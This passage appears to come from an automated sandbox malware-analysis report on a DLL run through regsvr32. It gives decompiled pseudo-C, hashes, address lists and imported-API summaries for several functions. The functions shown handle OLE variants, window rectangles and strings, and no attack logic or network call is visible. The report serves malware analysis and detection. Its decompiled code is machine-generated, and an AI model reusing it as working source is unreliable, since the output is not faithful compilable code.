                                                                                                                • Instruction ID: be6550e908f1e800e86f5072c3b819501bdb24c7a338a38086d66e6e9838e1b8
                                                                                                                • Opcode Fuzzy Hash: 6f18dcd10c8c3969c80a51775aa53bd8fb314a8bf8b8fda711ecb7624730db60
                                                                                                                • Instruction Fuzzy Hash: 2FE04F3A90113B96E351A764AD5039D37E4DB4B1A2F52013EDA00D7550EA65088B4BA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10033F16 Relevance: 9.4, APIs: 6, Instructions: 404COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E10033F16(void* __ebx, void* __ecx, signed short __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t163;
				signed short _t178;
				signed int _t184;
				signed short _t185;
				intOrPtr* _t187;
				void* _t189;
				signed short _t198;
				signed short _t200;
				signed int _t203;
				signed short _t206;
				signed short _t213;
				signed short _t215;
				signed short _t224;
				long long* _t231;
				intOrPtr* _t235;
				void* _t237;
				void* _t243;
				void* _t246;
				intOrPtr* _t248;
				void* _t254;
				void* _t257;
				signed int _t260;
				signed short _t261;
				signed short _t262;
				signed short _t266;
				signed short _t270;
				intOrPtr* _t271;
				void* _t281;
				signed short _t295;
				void* _t339;
				void* _t341;
				signed short _t343;
				void* _t344;
				intOrPtr* _t345;
				signed int _t346;
				void* _t348;
				intOrPtr _t352;
				signed long long _t358;

				_t342 = __esi;
				_t337 = __edx;
				_t282 = __ecx;
				_t346 = _t348 - 0x64;
				_t163 =  *0x1006dbdc; // 0xdf7c0cda
				 *(_t346 + 0x68) = _t163 ^ _t346;
				_push(0xcc);
				E1003D1E6(E10054A93, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t346 + 0x4c)) =  *((intOrPtr*)(_t346 + 0x74));
				_t339 = __ecx;
				 *(_t346 + 0x30) = 0;
				_t352 =  *((intOrPtr*)(__ecx + 0x48));
				_t353 = _t352 == 0;
				if(_t352 == 0) {
					L1:
					E1001729E(0, _t282, _t339, _t342, _t353);
				}
				if((0 |  *((intOrPtr*)(_t339 + 0x54)) != 0x00000000) == 0) {
					goto L1;
				}
				E1002A12B(_t346 + 0x3c);
				_t343 = 3;
				 *((intOrPtr*)(_t346 - 4)) = 0;
				 *(_t346 + 0x50) = _t343;
				E10031A51( *((intOrPtr*)(_t339 + 0x54)),  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
				if( *(_t346 + 0x50) != _t343) {
					_t340 =  *((intOrPtr*)(_t339 + 0x54));
					_t178 = E1002FB3A( *((intOrPtr*)(_t339 + 0x54)), __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
					__eflags = _t178;
					if(_t178 == 0) {
						goto L4;
					} else {
						_t184 =  *(_t346 + 0x50) & 0x0000ffff;
						_t345 = __imp__#9;
						__eflags = _t184 - 0x81;
						if(__eflags > 0) {
							_t185 = _t184 - 0x82;
							__eflags = _t185;
							if(__eflags == 0) {
								goto L50;
							} else {
								_t198 = _t185 - 1;
								__eflags = _t198;
								if(__eflags == 0) {
									_t200 = E10031796(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
									__eflags = _t200;
									if(_t200 != 0) {
										__eflags =  *(_t346 + 0x55);
										asm("fild qword [ebp+0x57]");
										if( *(_t346 + 0x55) > 0) {
											do {
												_t139 = _t346 + 0x55;
												 *_t139 =  *(_t346 + 0x55) - 1;
												__eflags =  *_t139;
												_t358 = _t358 /  *0x1005d258;
											} while ( *_t139 != 0);
										}
										__eflags =  *(_t346 + 0x56);
										if( *(_t346 + 0x56) == 0) {
											asm("fchs");
										}
										 *(_t346 - 0x14) = _t358;
										 *(_t346 - 0x1c) = 5;
										 *((char*)(_t346 - 4)) = 0xe;
										E1002A10B(_t346 - 0x1c, _t346 + 0x3c, _t346 - 0x1c);
										_t203 = _t346 - 0x1c;
										goto L30;
									}
								} else {
									_t206 = _t198;
									__eflags = _t206;
									if(__eflags == 0) {
										__eflags = E100317C0(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
										if(__eflags != 0) {
											asm("fldz");
											 *(_t346 + 0x58) = _t358;
											_t337 =  *(_t346 + 0x34);
											 *((intOrPtr*)(_t346 + 0x60)) = 0;
											E1002A35C(_t346 + 0x58, _t340, __eflags,  *(_t346 + 0x34),  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff, 0, 0, 0);
											 *_t346 = 7;
											 *(_t346 + 8) =  *(_t346 + 0x58);
											 *((char*)(_t346 - 4)) = 0xf;
											E1002A10B(_t346, _t346 + 0x3c, _t346);
											_t203 = _t346;
											goto L30;
										}
									} else {
										_t213 = _t206 - 1;
										__eflags = _t213;
										if(__eflags == 0) {
											_t215 = E100317C0(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
											__eflags = _t215;
											if(_t215 != 0) {
												asm("fldz");
												 *(_t346 + 0x58) = _t358;
												 *((intOrPtr*)(_t346 + 0x60)) = 0;
												E1002FA46( *(_t346 + 0x34) & 0x0000ffff,  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff);
												 *(_t346 - 0x4c) = 7;
												 *(_t346 - 0x44) =  *(_t346 + 0x58);
												 *((char*)(_t346 - 4)) = 0x10;
												E1002A10B(_t346 - 0x4c, _t346 + 0x3c, _t346 - 0x4c);
												_t203 = _t346 - 0x4c;
												goto L30;
											}
										} else {
											__eflags = _t213 - 1;
											if(__eflags == 0) {
												_t224 = E100317F5(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
												__eflags = _t224;
												if(_t224 != 0) {
													_t231 = E100319A1(_t346 - 0xd8,  *((short*)(_t346 + 0x54)),  *(_t346 + 0x56) & 0x0000ffff,  *(_t346 + 0x58) & 0x0000ffff,  *(_t346 + 0x5a) & 0x0000ffff,  *(_t346 + 0x5c) & 0x0000ffff,  *(_t346 + 0x5e) & 0x0000ffff);
													 *(_t346 - 0x3c) = 7;
													 *((long long*)(_t346 - 0x34)) =  *_t231;
													 *((char*)(_t346 - 4)) = 0x11;
													E1002A10B(_t346 - 0x3c, _t346 + 0x3c, _t346 - 0x3c);
													_t203 = _t346 - 0x3c;
													goto L30;
												}
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t235 = E10005030(_t337, _t346, E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
								 *((char*)(_t346 - 4)) = 2;
								_t237 = E1002A4B8(0, _t346 - 0xbc, _t340, _t345, __eflags);
								 *((char*)(_t346 - 4)) = 3;
								E1002A10B(_t237, _t346 + 0x3c, _t237);
								 *_t345(_t346 - 0xbc,  *_t235, 8);
								_t295 =  *(_t346 + 0x50);
								goto L51;
							} else {
								__eflags = _t184 - 8;
								if(__eflags > 0) {
									__eflags = _t184 - 0xb;
									if(__eflags == 0) {
										_t243 = E1002A054(_t346 - 0x9c,  *(E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 0xb);
										 *((char*)(_t346 - 4)) = 0xb;
										E1002A10B(_t243, _t346 + 0x3c, _t243);
										_t203 = _t346 - 0x9c;
										goto L30;
									} else {
										__eflags = _t184 - 0xc;
										if(__eflags == 0) {
											_t246 = E1002A3BC(_t346 - 0x8c, E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
											 *((char*)(_t346 - 4)) = 1;
											E1002A10B(_t246, _t346 + 0x3c, _t246);
											_t203 = _t346 - 0x8c;
											goto L30;
										} else {
											__eflags = _t184 - 0xf;
											if(_t184 > 0xf) {
												__eflags = _t184 - 0x11;
												if(__eflags <= 0) {
													_t248 = E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
													 *(_t346 - 0x5c) = 0x11;
													 *((char*)(_t346 - 0x54)) =  *_t248;
													 *((char*)(_t346 - 4)) = 6;
													E1002A10B(_t346 - 0x5c, _t346 + 0x3c, _t346 - 0x5c);
													_t203 = _t346 - 0x5c;
													goto L30;
												} else {
													__eflags = _t184 - 0x12;
													if(__eflags == 0) {
														goto L27;
													} else {
														__eflags = _t184 - 0x13;
														if(__eflags == 0) {
															goto L26;
														}
													}
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										L50:
										_t187 = E10017166(0, _t346 + 0x30, _t337, _t340, _t345, __eflags);
										 *((char*)(_t346 - 4)) = 4;
										_t189 = E1002A4B8(0, _t346 - 0xcc, _t340, _t345, __eflags);
										 *((char*)(_t346 - 4)) = 5;
										E1002A10B(_t189, _t346 + 0x3c, _t189);
										 *_t345(_t346 - 0xcc,  *_t187, 8, E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
										_t295 =  *(_t346 + 0x30);
										L51:
										__eflags = _t295 + 0xfffffff0;
										 *((char*)(_t346 - 4)) = 0;
										E10001020(_t295 + 0xfffffff0, _t337);
									} else {
										_t260 = _t184;
										__eflags = _t260;
										if(__eflags == 0) {
											L27:
											_t254 = E1002A054(_t346 - 0xac,  *(E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 2);
											 *((char*)(_t346 - 4)) = 7;
											E1002A10B(_t254, _t346 + 0x3c, _t254);
											_t203 = _t346 - 0xac;
											goto L30;
										} else {
											_t261 = _t260 - 1;
											__eflags = _t261;
											if(__eflags == 0) {
												L26:
												_t257 = E1002A07B(_t346 - 0x7c,  *(E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))), 3);
												 *((char*)(_t346 - 4)) = 8;
												E1002A10B(_t257, _t346 + 0x3c, _t257);
												_t203 = _t346 - 0x7c;
												goto L30;
											} else {
												_t262 = _t261 - 1;
												__eflags = _t262;
												if(__eflags == 0) {
													 *(_t346 + 0x50) =  *(E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
													 *(_t346 + 0x10) = 4;
													 *(_t346 + 0x18) =  *(_t346 + 0x50);
													 *((char*)(_t346 - 4)) = 9;
													E1002A10B(_t346 + 0x10, _t346 + 0x3c, _t346 + 0x10);
													_t203 = _t346 + 0x10;
													goto L30;
												} else {
													_t266 = _t262 - 1;
													__eflags = _t266;
													if(__eflags == 0) {
														 *(_t346 - 0x24) =  *(E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
														 *(_t346 - 0x2c) = 5;
														 *((char*)(_t346 - 4)) = 0xa;
														E1002A10B(_t346 - 0x2c, _t346 + 0x3c, _t346 - 0x2c);
														_t203 = _t346 - 0x2c;
														goto L30;
													} else {
														_t270 = _t266 - 1;
														__eflags = _t270;
														if(__eflags == 0) {
															_t271 = E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
															 *(_t346 + 0x20) = 6;
															 *((intOrPtr*)(_t346 + 0x28)) =  *_t271;
															 *((intOrPtr*)(_t346 + 0x2c)) =  *((intOrPtr*)(_t271 + 4));
															 *((char*)(_t346 - 4)) = 0xd;
															E1002A10B(_t346 + 0x20, _t346 + 0x3c, _t346 + 0x20);
															_t203 = _t346 + 0x20;
															goto L30;
														} else {
															__eflags = _t270 - 1;
															if(__eflags == 0) {
																 *(_t346 - 0x64) =  *(E1002FB6B(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
																 *(_t346 - 0x6c) = 7;
																 *((char*)(_t346 - 4)) = 0xc;
																E1002A10B(_t346 - 0x6c, _t346 + 0x3c, _t346 - 0x6c);
																_t203 = _t346 - 0x6c;
																L30:
																 *((char*)(_t346 - 4)) = 0;
																 *_t345(_t203);
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						E1002A3BC( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
						 *_t345(_t346 + 0x3c);
					}
				} else {
					L4:
					E1002A3BC( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
					__imp__#9(_t346 + 0x3c);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t346 - 0xc));
				_pop(_t341);
				_pop(_t344);
				_pop(_t281);
				return E1003B437( *((intOrPtr*)(_t346 + 0x4c)), _t281,  *(_t346 + 0x68) ^ _t346, _t337, _t341, _t344);
			}










































                                                                                                                0x10033f16
                                                                                                                0x10033f16
                                                                                                                0x10033f16
                                                                                                                0x10033f1a
                                                                                                                0x10033f1e
                                                                                                                0x10033f25
                                                                                                                0x10033f28
                                                                                                                0x10033f32
                                                                                                                0x10033f3c
                                                                                                                0x10033f41
                                                                                                                0x10033f43
                                                                                                                0x10033f46
                                                                                                                0x10033f4c
                                                                                                                0x10033f4e
                                                                                                                0x10033f50
                                                                                                                0x10033f50
                                                                                                                0x10033f50
                                                                                                                0x10033f5f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033f65
                                                                                                                0x10033f6f
                                                                                                                0x10033f77
                                                                                                                0x10033f7a
                                                                                                                0x10033f7d
                                                                                                                0x10033f85
                                                                                                                0x10033fa2
                                                                                                                0x10033fae
                                                                                                                0x10033fb3
                                                                                                                0x10033fb5
                                                                                                                0x00000000
                                                                                                                0x10033fb7
                                                                                                                0x10033fb7
                                                                                                                0x10033fbb
                                                                                                                0x10033fc6
                                                                                                                0x10033fc8
                                                                                                                0x10034222
                                                                                                                0x10034222
                                                                                                                0x10034227
                                                                                                                0x00000000
                                                                                                                0x1003422d
                                                                                                                0x1003422d
                                                                                                                0x1003422d
                                                                                                                0x1003422e
                                                                                                                0x10034366
                                                                                                                0x1003436b
                                                                                                                0x1003436d
                                                                                                                0x10034373
                                                                                                                0x10034376
                                                                                                                0x10034379
                                                                                                                0x1003437b
                                                                                                                0x1003437b
                                                                                                                0x1003437b
                                                                                                                0x1003437b
                                                                                                                0x1003437e
                                                                                                                0x1003437e
                                                                                                                0x1003437b
                                                                                                                0x10034386
                                                                                                                0x10034389
                                                                                                                0x1003438b
                                                                                                                0x1003438b
                                                                                                                0x1003438d
                                                                                                                0x10034390
                                                                                                                0x1003439d
                                                                                                                0x100343a1
                                                                                                                0x100343a6
                                                                                                                0x00000000
                                                                                                                0x100343a6
                                                                                                                0x10034234
                                                                                                                0x10034235
                                                                                                                0x10034235
                                                                                                                0x10034236
                                                                                                                0x1003430f
                                                                                                                0x10034311
                                                                                                                0x1003431b
                                                                                                                0x10034321
                                                                                                                0x10034324
                                                                                                                0x10034331
                                                                                                                0x10034334
                                                                                                                0x10034339
                                                                                                                0x10034342
                                                                                                                0x1003434c
                                                                                                                0x10034350
                                                                                                                0x10034355
                                                                                                                0x00000000
                                                                                                                0x10034355
                                                                                                                0x1003423c
                                                                                                                0x1003423c
                                                                                                                0x1003423c
                                                                                                                0x1003423d
                                                                                                                0x100342b1
                                                                                                                0x100342b6
                                                                                                                0x100342b8
                                                                                                                0x100342c2
                                                                                                                0x100342c5
                                                                                                                0x100342d5
                                                                                                                0x100342d8
                                                                                                                0x100342dd
                                                                                                                0x100342e6
                                                                                                                0x100342f0
                                                                                                                0x100342f4
                                                                                                                0x100342f9
                                                                                                                0x00000000
                                                                                                                0x100342f9
                                                                                                                0x1003423f
                                                                                                                0x1003423f
                                                                                                                0x10034240
                                                                                                                0x1003424f
                                                                                                                0x10034254
                                                                                                                0x10034256
                                                                                                                0x10034280
                                                                                                                0x10034285
                                                                                                                0x1003428d
                                                                                                                0x10034297
                                                                                                                0x1003429b
                                                                                                                0x100342a0
                                                                                                                0x00000000
                                                                                                                0x100342a0
                                                                                                                0x10034256
                                                                                                                0x10034240
                                                                                                                0x1003423d
                                                                                                                0x10034236
                                                                                                                0x1003422e
                                                                                                                0x10033fce
                                                                                                                0x10033fce
                                                                                                                0x100341eb
                                                                                                                0x100341fb
                                                                                                                0x100341ff
                                                                                                                0x10034208
                                                                                                                0x1003420c
                                                                                                                0x10034218
                                                                                                                0x1003421a
                                                                                                                0x00000000
                                                                                                                0x10033fd4
                                                                                                                0x10033fd4
                                                                                                                0x10033fd7
                                                                                                                0x100340c6
                                                                                                                0x100340c9
                                                                                                                0x100341c3
                                                                                                                0x100341cc
                                                                                                                0x100341d0
                                                                                                                0x100341d5
                                                                                                                0x00000000
                                                                                                                0x100340cf
                                                                                                                0x100340cf
                                                                                                                0x100340d2
                                                                                                                0x1003418a
                                                                                                                0x10034193
                                                                                                                0x10034197
                                                                                                                0x1003419c
                                                                                                                0x00000000
                                                                                                                0x100340d8
                                                                                                                0x100340d8
                                                                                                                0x100340db
                                                                                                                0x100340e1
                                                                                                                0x100340e4
                                                                                                                0x10034154
                                                                                                                0x1003415b
                                                                                                                0x10034161
                                                                                                                0x1003416b
                                                                                                                0x1003416f
                                                                                                                0x10034174
                                                                                                                0x00000000
                                                                                                                0x100340e6
                                                                                                                0x100340e6
                                                                                                                0x100340e9
                                                                                                                0x00000000
                                                                                                                0x100340eb
                                                                                                                0x100340eb
                                                                                                                0x100340ee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100340ee
                                                                                                                0x100340e9
                                                                                                                0x100340e4
                                                                                                                0x100340db
                                                                                                                0x100340d2
                                                                                                                0x10033fdd
                                                                                                                0x10033fdd
                                                                                                                0x100343ae
                                                                                                                0x100343bc
                                                                                                                0x100343cc
                                                                                                                0x100343d0
                                                                                                                0x100343d9
                                                                                                                0x100343dd
                                                                                                                0x100343e9
                                                                                                                0x100343eb
                                                                                                                0x100343ee
                                                                                                                0x100343ee
                                                                                                                0x100343f1
                                                                                                                0x100343f4
                                                                                                                0x10033fe3
                                                                                                                0x10033fe4
                                                                                                                0x10033fe4
                                                                                                                0x10033fe5
                                                                                                                0x1003411f
                                                                                                                0x10034135
                                                                                                                0x1003413e
                                                                                                                0x10034142
                                                                                                                0x10034147
                                                                                                                0x00000000
                                                                                                                0x10033feb
                                                                                                                0x10033feb
                                                                                                                0x10033feb
                                                                                                                0x10033fec
                                                                                                                0x100340f4
                                                                                                                0x10034105
                                                                                                                0x1003410e
                                                                                                                0x10034112
                                                                                                                0x10034117
                                                                                                                0x00000000
                                                                                                                0x10033ff2
                                                                                                                0x10033ff2
                                                                                                                0x10033ff2
                                                                                                                0x10033ff3
                                                                                                                0x1003409f
                                                                                                                0x100340a2
                                                                                                                0x100340ab
                                                                                                                0x100340b5
                                                                                                                0x100340b9
                                                                                                                0x100340be
                                                                                                                0x00000000
                                                                                                                0x10033ff9
                                                                                                                0x10033ff9
                                                                                                                0x10033ff9
                                                                                                                0x10033ffa
                                                                                                                0x10034072
                                                                                                                0x10034075
                                                                                                                0x10034082
                                                                                                                0x10034086
                                                                                                                0x1003408b
                                                                                                                0x00000000
                                                                                                                0x10033ffc
                                                                                                                0x10033ffc
                                                                                                                0x10033ffc
                                                                                                                0x10033ffd
                                                                                                                0x10034038
                                                                                                                0x10034042
                                                                                                                0x10034048
                                                                                                                0x1003404b
                                                                                                                0x10034055
                                                                                                                0x10034059
                                                                                                                0x1003405e
                                                                                                                0x00000000
                                                                                                                0x10033fff
                                                                                                                0x10033fff
                                                                                                                0x10034000
                                                                                                                0x10034012
                                                                                                                0x10034015
                                                                                                                0x10034022
                                                                                                                0x10034026
                                                                                                                0x1003402b
                                                                                                                0x100341a2
                                                                                                                0x100341a3
                                                                                                                0x100341a6
                                                                                                                0x100341a6
                                                                                                                0x10034000
                                                                                                                0x10033ffd
                                                                                                                0x10033ffa
                                                                                                                0x10033ff3
                                                                                                                0x10033fec
                                                                                                                0x10033fe5
                                                                                                                0x10033fdd
                                                                                                                0x10033fd7
                                                                                                                0x10033fce
                                                                                                                0x10034400
                                                                                                                0x10034409
                                                                                                                0x10034409
                                                                                                                0x10033f87
                                                                                                                0x10033f87
                                                                                                                0x10033f8e
                                                                                                                0x10033f97
                                                                                                                0x10033f97
                                                                                                                0x10034411
                                                                                                                0x10034419
                                                                                                                0x1003441a
                                                                                                                0x1003441b
                                                                                                                0x1003442a

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10033F32
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10033F97
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • VariantClear.OLEAUT32(?), ref: 100341A6
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10034218
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10034409
                                                                                                                  • Part of subcall function 1002A10B: VariantCopy.OLEAUT32(?,?), ref: 1002A119
                                                                                                                  • Part of subcall function 1002A4B8: __EH_prolog3.LIBCMT ref: 1002A4C2
                                                                                                                  • Part of subcall function 1002A4B8: lstrlenA.KERNEL32(?,?,?,00000224), ref: 1002A4E1
                                                                                                                  • Part of subcall function 1002A4B8: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002A4E9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Clear$H_prolog3$AllocByteCopyException@8StringThrowlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1791476184-0
                                                                                                                • Opcode ID: e1327913ead6246f29673d50ac3e487507b361d8352e8eaf00822395e0ab80ff
                                                                                                                • Instruction ID: 09c86e58abf00dc0f56b5a78a577800547e1b0ef494a109da026d4d4a3b1e213
                                                                                                                • Opcode Fuzzy Hash: e1327913ead6246f29673d50ac3e487507b361d8352e8eaf00822395e0ab80ff
                                                                                                                • Instruction Fuzzy Hash: 88F1497880014CEEDF16DFA0C8909ED7BB9EF08341F81805AFD519B291DF74AA88DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003A135 Relevance: 9.3, APIs: 6, Instructions: 326COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10039A4B: PeekMessageA.USER32(00000000,00000000,0000000F,0000000F,00000000), ref: 10039A8C
                                                                                                                  • Part of subcall function 10039A4B: SetRectEmpty.USER32(?), ref: 10039AB0
                                                                                                                  • Part of subcall function 10039A4B: GetDesktopWindow.USER32 ref: 10039AC8
                                                                                                                  • Part of subcall function 10039A4B: LockWindowUpdate.USER32(?), ref: 10039AD9
                                                                                                                  • Part of subcall function 10039A4B: GetDCEx.USER32 ref: 10039AF0
                                                                                                                  • Part of subcall function 10023E56: GetModuleHandleA.KERNEL32(GDI32.DLL,?,1003A15C), ref: 10023E5E
                                                                                                                  • Part of subcall function 10023E56: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10023E6A
                                                                                                                • GetWindowRect.USER32 ref: 1003A182
                                                                                                                  • Part of subcall function 10023E8C: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,1003A169,00000000), ref: 10023E95
                                                                                                                  • Part of subcall function 10023E8C: GetProcAddress.KERNEL32(00000000,SetLayout,?,?,1003A169,00000000), ref: 10023EA3
                                                                                                                • InflateRect.USER32 ref: 1003A274
                                                                                                                • InflateRect.USER32 ref: 1003A41A
                                                                                                                  • Part of subcall function 10039923: OffsetRect.USER32 ref: 1003995A
                                                                                                                  • Part of subcall function 10039C69: OffsetRect.USER32 ref: 10039C92
                                                                                                                  • Part of subcall function 10039C69: OffsetRect.USER32 ref: 10039C9C
                                                                                                                  • Part of subcall function 10039C69: OffsetRect.USER32 ref: 10039CA6
                                                                                                                  • Part of subcall function 10039C69: OffsetRect.USER32 ref: 10039CB0
                                                                                                                  • Part of subcall function 1003A01A: GetCapture.USER32 ref: 1003A02B
                                                                                                                  • Part of subcall function 1003A01A: SetCapture.USER32(?), ref: 1003A03B
                                                                                                                  • Part of subcall function 1003A01A: GetCapture.USER32 ref: 1003A047
                                                                                                                  • Part of subcall function 1003A01A: GetMessageA.USER32 ref: 1003A061
                                                                                                                  • Part of subcall function 1003A01A: DispatchMessageA.USER32 ref: 1003A093
                                                                                                                  • Part of subcall function 1003A01A: GetCapture.USER32 ref: 1003A0F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Offset$Capture$MessageWindow$AddressHandleInflateModuleProc$DesktopDispatchEmptyLockPeekUpdate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1062258019-0
                                                                                                                • Opcode ID: 5638e21eaa3b4bd5c33c31e36ca3bd77f01a579d162c68711d773bd113cdf187
                                                                                                                • Instruction ID: bec46a71e5a49e7b2dec3384879b20c7eb10a58319cbce7a36d64cb5955b44f6
                                                                                                                • Opcode Fuzzy Hash: 5638e21eaa3b4bd5c33c31e36ca3bd77f01a579d162c68711d773bd113cdf187
                                                                                                                • Instruction Fuzzy Hash: C6B12B76900618AFCF01DFA4C881EEE7BBAEF4A311F104594FD05AF256D671AE84CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002CAD4 Relevance: 9.3, APIs: 6, Instructions: 253stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 65%
                                                                                                                			E1002CAD4(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t121;
				int _t122;
				CHAR* _t127;
				CHAR* _t135;
				CHAR* _t140;
				signed short* _t142;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t151;
				signed int _t158;
				signed int _t169;
				CHAR* _t173;
				void* _t176;
				void* _t179;
				signed short _t181;
				signed int _t183;
				intOrPtr _t185;
				CHAR* _t188;
				int _t190;
				char* _t193;
				void* _t194;
				void* _t195;
				CHAR* _t196;
				char* _t198;
				void* _t199;
				long long _t204;

				_t199 = __eflags;
				_t185 = __edx;
				_push(0x50);
				E1003D285(E10054167, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
				E100231D3(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
				_t173 =  *(_t195 + 8);
				_t121 = _t173[8];
				_t187 = 0;
				 *(_t195 - 4) = 0;
				 *(_t195 - 0x1d) = 0;
				 *(_t195 - 0x18) = _t121;
				if(_t121 == 0) {
					 *(_t195 - 0x18) = _t195 - 0x1d;
				}
				_t122 = lstrlenA( *(_t195 - 0x18));
				_t201 =  *(_t195 + 0xc) & 0x0000000c;
				_t190 = _t122;
				 *(_t195 - 0x28) = _t173[0x10];
				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
					L11:
					_t191 =  *(_t195 + 0x14);
					_t127 = E100151B0(_t185, __eflags,  *(_t191 + 8) << 4);
					__eflags = _t127;
					_pop(_t176);
					if(_t127 != 0) {
						_t191 =  *(_t191 + 8);
						__eflags = _t191 - 0x7ffffff;
						if(_t191 > 0x7ffffff) {
							goto L12;
						}
						_t192 = _t191 << 4;
						E1003CBD0(_t191 << 4);
						 *(_t195 - 0x10) = _t196;
						 *(_t195 - 0x1c) = _t196;
						E1003BB70(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
						_t198 =  &(_t196[0xc]);
						_t187 = E1002C6C6(_t176, _t187, _t192,  *(_t195 - 0x18),  *(_t195 - 0x24));
						_t49 = _t187 + 0x10; // 0x10
						_t191 = _t49;
						_t135 = E100151B0(_t185, __eflags, _t49);
						__eflags = _t135;
						if(_t135 == 0) {
							L4:
							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
							if( *(_t195 - 0x2c) == 0) {
								L7:
								L55:
								return E1003D2E1(_t173, _t187, _t191);
							}
							_push( *((intOrPtr*)(_t195 - 0x30)));
							_push(0);
							L6:
							E10022A6E();
							goto L7;
						}
						E1003CBD0(_t191);
						 *(_t195 - 0x10) = _t198;
						_t173 = 0;
						_t193 = _t198;
						 *((intOrPtr*)(_t195 - 0x58)) = 0x1005a004;
						 *((intOrPtr*)(_t195 - 0x54)) = 0;
						 *((intOrPtr*)(_t195 - 0x48)) = 0;
						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
						 *((intOrPtr*)(_t195 - 0x50)) = 0;
						_push(_t195 - 0x58);
						_push( *(_t195 - 0x1c));
						_push( *((intOrPtr*)(_t195 + 0x18)));
						 *(_t195 - 4) = 1;
						_push( *(_t195 + 0x14));
						_push( *(_t195 - 0x24));
